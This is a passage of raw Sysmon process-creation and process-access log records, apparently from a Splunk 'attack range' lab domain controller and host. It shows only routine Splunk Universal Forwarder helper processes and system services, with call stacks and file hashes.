Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032983Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032982Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032981Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032980Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032979Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-370A-6013-8103-00000000A401}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032978Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-370A-6013-8103-00000000A401}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032977Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-370A-6013-8103-00000000A401}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362397Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-370b-6013-bd03-000000001100}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362396Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362395Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362394Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362393Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362392Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-370b-6013-bd03-000000001100}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362391Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.336{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-370b-6013-bd03-000000001100}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362390Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:31.196{8e433fbf-370b-6013-bd03-000000001100}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033001Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-370B-6013-8303-00000000A401}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033000Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032999Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032998Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032997Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032996Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-370B-6013-8303-00000000A401}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032995Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.975{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-370B-6013-8303-00000000A401}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032994Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.976{FF16AF91-370B-6013-8303-00000000A401}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032993Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.506{FF16AF91-370B-6013-8203-00000000A401}61527100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032992Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.350{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-370B-6013-8203-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032991Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032990Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032989Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 